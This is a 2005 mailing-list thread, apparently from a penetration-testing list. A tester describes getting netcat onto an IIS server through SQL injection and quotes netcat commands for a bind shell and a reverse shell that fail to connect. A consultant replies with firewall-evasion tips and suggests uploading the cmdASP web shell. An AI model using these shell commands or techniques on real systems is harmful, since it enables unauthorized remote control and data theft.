From: Mariano Nuñez Di Croce (mnunez@cybsec.com)
Date: Wed Jun 01 2005 - 10:40:30 EDT
You probably have a firewall in front of the target webserver.
I would recommend you to follow the following steps:
1. Do a tcp full scan to see if you can get one port in "closed"
state. Then try to bind netcat to that port and connect remotely.
2. If the firewall if statefull I think you won't be able to reverse
connect to your public IP, because it will filter the outgoing SYN
packet. Anyway, you should try to connect to your public IP in common
ports, like 21,53 and 80. Maybe those aren't filtered.
By the way, if you want a shell-like prompt, you can upload cmdASP,
which provides shell interaction through an ASP page.
Hope this helps,
------------------------------
Mariano Nuñez Di Croce
CYBSEC S.A. Security Systems
Email: mnunez@cybsec.com
Tel/Fax: (54-11) 4382-1600
Web: http://www.cybsec.com
------------------------------
intel96 wrote:
> To All,
>
> I am conducting a pentest and I have been able to upload netcat to the
> web server (IIS 6.0 - with ports 80/443 open) via ftp. I have tried to
> establish a shell both ways, but cannot get it to work:
>
> On the web server I first tried: nc.exe –l –p 8000 –e cmd.exe
>
> When I tried to connect to port 8000 on the web server I received a
> timeout on my side. I have also tried this with port 53 and it also
> did not work.
>
> I than tried: nc.exe –nv my_public_ip_address 443 -d –e cmd.exe
>
> This did not work either. I did not see the remote system trying to
> connect to my system via my logs. I have access to upload anything to
> the system and run most commands via sql injections. I have
> administrator level access on the system at this time.
>
> Any ideas on how I can get this shell to work? Or there any other
> commands that may provide me more access or allow me to dump the
> database?
>
> Thanks,
>
> Intel96
>
>
>
>
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:22 EDT